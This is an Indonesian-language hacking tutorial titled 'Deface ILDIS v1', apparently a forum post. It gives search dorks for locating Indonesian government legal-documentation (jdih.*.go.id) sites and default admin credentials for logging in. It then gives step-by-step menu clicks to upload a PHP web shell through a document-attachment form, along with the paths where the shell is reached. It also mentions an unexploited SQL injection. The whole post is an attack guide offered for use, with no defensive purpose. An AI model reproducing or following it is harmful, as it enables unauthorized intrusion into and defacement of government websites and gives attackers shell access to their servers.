" Deface ILDIS v1 - Default Username/Password "
-
Di ildis v1 yah. ildis v1 sendiri di build di Bono Framework, dan saya sempat menemukan Vulnerability SQL Injection disana, but i can't inject this site :D, ga tau itu type apa
-
Dork !
~> site:jdih.*.go.id
~> site:jdih.*.*.go.id
~> site:jdih.dprd.*.go.id
~> site:jdih-dprd.*.go.id
Login page !
~> https://localhost/index.php/login
~> https://localhost/[path]/index.php/login
Default Username/Password
~> Username : admin
~> Password : password
-
Login Page
-
Login menggunakan username dan password diatas, dan jika vuln kalian akan dibawa kedalam dashboard admin
-
Click garis tiga di pojok kanan atas ~> Click Dokumen ~> Click Create ~> Click Lampiran ~> Click Tambah
-
Upload shell kalian diform upload tersebut yah :D. Dan untuk akses shellnya di directory berikut
-
~> https://localhost/storage/document/shell.php
~> https://localhost/[path]/storage/document/Iya.php
-
Bay :)


